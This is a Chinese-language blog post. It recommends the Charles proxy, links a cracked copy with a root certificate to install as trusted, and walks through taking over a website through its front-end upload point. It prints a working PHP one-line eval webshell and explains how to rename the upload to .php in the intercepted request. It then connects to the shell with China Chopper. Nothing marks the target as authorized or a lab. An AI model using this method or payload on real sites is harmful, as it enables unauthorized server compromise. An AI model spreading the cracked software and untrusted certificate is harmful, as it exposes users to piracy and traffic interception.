抓包工具里的圣杯charles
软件安装简单。下载地址:https://www.haiyangtop.cn/charles.rar 。根据你是X86还是X64机器来安装不同的charles版本,里边还有个破解文件charles.jar,要放在charles安装目录底下的lib目录。你再是找到压缩文件里边的ssl证书,双击安装,注意安装时要安装到受信任的根证书目录。
开始前台拿webshell
我在一个网站的前台找到了一个上传点。我们先来上传一张正常的图片,然后在浏览器上右键点击图片检查,找到了上传路径。
我们打开charles抓包来分析一下吧。你打开charles之后并不需要你改动其它什么,直接就能抓包了。现在上传一张正常图片的抓包。
开始上传一句话,一句话内容:1
<?php @eval($_POST['chopper']);?>
上传成功,我们改下文件名。点击上面有支笔的图标修改上传内容,改文件名为55.php,并点击下面的Execute再次提交。
构造下一句话地址,访问成功。
菜刀连接一句话
成功连接一句话。
我写这篇文章时,大家以为很简单就传上去了,其实我花费了足足有3个小时的功夫,经过了不断测试才成功,这次我用burpsuite来拦截上传失败了,不知道啥原因,写这篇文章时又理清了思考细节,所以你觉得很流畅。